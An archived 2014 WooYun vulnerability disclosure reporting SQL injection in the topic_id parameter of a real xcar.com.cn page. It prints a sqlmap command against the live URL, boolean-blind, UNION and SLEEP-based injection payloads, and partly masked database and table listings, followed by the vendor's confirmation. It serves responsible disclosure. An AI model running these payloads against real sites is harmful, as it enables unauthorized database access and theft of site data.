乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-28: 细节已通知厂商并且等待厂商处理中 2014-07-28: 厂商已经确认,细节仅向厂商公开 2014-08-07: 细节向核心白帽子及相关领域专家公开 2014-08-17: 细节向普通白帽子公开 2014-08-27: 细节向实习白帽子公开 2014-09-11: 细节向公众公开
数据都在这了
sqlmap.py -u "http://topic.xcar.com.cn/HONDA_ACCORD/comment/?topic_id=123" --dbs
---Place: GETParameter: topic_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: topic_id=123' AND 8305=8305 AND 'XYYf'='XYYf Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: topic_id=123' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171747271,0x707765725364516a6261,0x716d6a6671),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: topic_id=123' AND SLEEP(5) AND 'nwRd'='nwRd---back-end DBMS: MySQL 5.0.11
库
available databases [9]:[*] b***o[*] b***b[*] i***hema[*] m***l[*] s***[*] test[*] x***[*] xc***[*] xc***ew
Database: xc***w[29 tables]+----------------------------------------+| com***ist || co***ain || c***ly || co***ub || xc***rson || xc***db || x***rum || xc***t || xc***ss || xca***ot || x***117 || xc***327 || xca***2 || xcar_***x || xcar***py || xca***y || xcar_b***2400 || xcar***max || xca***py || xca***p || xc***st || x*** || xc*** || xc***a || x***e || x***11 || xca***user || xca***fo || xc***on |+----------------------------------------+
x***部分数据在这了
Database: x***b2[202 tables]+----------------------------------------+| a*** || a*** || ad_type || ad_value || a*** || a*** || a*** || adb_carer || ad*** || a*** || ***yota || a*** || ad***r || ad*** || ad*** || ad***s || ad***s || ad***s || ad*** || a***he || a***nts || a***ig || a***es || a***k || ad***n || ad***tats || a***og || ad***es || ar***ext || ar***py || ar***l || ar***pe || ar***ue || ar***t || au***c || au***ty || au***ket || aut***en || aut***ce || aut***p || a***ex || au***el || aut***en || au***e || autv***slib || a***er || bb*** || bb***s || bb***og || bm || car_test || car***d || car***r || card***r || car***or || car*** || card***s || ca***e || ch*** || ch*** || cha***_blacklist || co***in || comm***ply || com***ce || co***b || day***o || day***nfo || da***nfo || dc*** || dc*** || dc_*** || dc*** || dc*** || dc_xx || di***er1 || dia***2 || di***3 || di***r4 || d***5 || dia***6 || ed*** || ex***e || fks***me || g***l || h*** || hy_***y || h*** || i*** || ir***r || junv*** || |+----------------------------------------+
不深入测试了
如上
过滤
危害等级:高
漏洞Rank:12
确认时间:2014-07-28 14:07
感谢白帽子 @niliu 的帮助,我们会尽快修复。感谢的同时,如果可以,也希望以后提交的报告当中能证明即可,尽量别贴出所有的信息,那样就更感激涕零了。再次感谢@niliu白帽子!
暂无
